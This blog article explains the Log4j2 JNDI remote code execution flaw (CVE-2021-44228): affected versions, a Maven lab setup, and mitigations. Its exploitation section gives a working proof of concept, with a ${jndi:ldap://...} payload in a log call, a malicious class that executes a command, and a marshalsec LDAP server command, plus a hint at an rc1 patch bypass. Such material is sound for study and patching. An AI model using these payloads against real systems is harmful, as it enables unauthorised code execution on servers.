BestHub
search
Sign in
Information Security 6 min read

Log4j2 Remote Code Execution Vulnerability: Exploitation Steps and Mitigation

This article explains the Log4j2 remote code execution vulnerability, its affected versions, how to set up a test environment, detailed exploit code examples, and recommended mitigation measures including upgrades and JVM configuration changes.

Top Architect
Top Architect
Top Architect
Log4j2 Remote Code Execution Vulnerability: Exploitation Steps and Mitigation

Apache Log4j2 is a widely used open‑source Java logging framework that suffered a critical remote code execution vulnerability due to unsafe recursive lookups, allowing unauthenticated attackers to execute arbitrary code on vulnerable servers.

Vulnerability Overview : The flaw affects Log4j2 versions up to 2.15.0‑rc1 and can be triggered by sending specially crafted data that triggers JNDI lookups such as ${jndi:ldap://...} .

Impact Scope : All applications using Log4j2 2.x ≤ 2.15.0‑rc1 are vulnerable.

Environment Setup : Create a new Maven project and add the following dependency:

<dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-core</artifactId>
    <version>2.14.1</version>
</dependency>

Build the project and include the Log4j2 library.

Exploitation Steps :

Use a PoC Java class to trigger the vulnerability:

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

class LogTest {
    public static final Logger logger = LogManager.getLogger();
    public static void main(String[] args) {
        logger.error("${jndi:ldap://localhost:8888/Exploit}");
    }
}

2. Compile a malicious class Exploit.class that runs a command (e.g., calc ) when loaded:

class Exploit {
    static {
        System.err.println("Pwned");
        try {
            String cmds = "calc";
            Runtime.getRuntime().exec(cmds);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

Compile with javac exp.java .

3. Start a malicious LDAP server using marshalsec-0.0.3-SNAPSHOT-all.jar :

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:7777/#Exploit" 8888

4. Run the PoC program; the vulnerable Log4j2 instance will fetch the malicious class from the LDAP server and execute the embedded command.

Additional tricks such as crafted ?Type=A Type&Name=1100110&Char=! payloads can bypass early patches (rc1). The official fix is available in Log4j2 2.15.0‑rc2 and later.

Mitigation :

Upgrade to the latest Log4j2 version (e.g., 2.15.0‑rc2 or newer).

Add JVM option -Dlog4j2.formatMsgNoLookups=true .

Place a log4j2.component.properties file on the classpath with log4j2.formatMsgNoLookups=true .

Use JDK 11.0.1+, 8u191+, 7u201+, or 6u211+.

Deploy third‑party web‑application firewalls for additional protection.

For reference, see the official GitHub comparison link and release notes for the patched versions.

javaSecurityvulnerabilityLog4j2exploitCVE-2021-44228
Top Architect
Written by

Top Architect

Top Architect focuses on sharing practical architecture knowledge, covering enterprise, system, website, large‑scale distributed, and high‑availability architectures, plus architecture adjustments using internet technologies. We welcome idea‑driven, sharing‑oriented architects to exchange and learn together.

0 followers
Reader feedback

How this landed with the community

login Sign in to like

Rate this article

Was this worth your time?

Sign in to rate
Discussion

0 Comments

Thoughtful readers leave field notes, pushback, and hard-won operational detail here.

Sign in to comment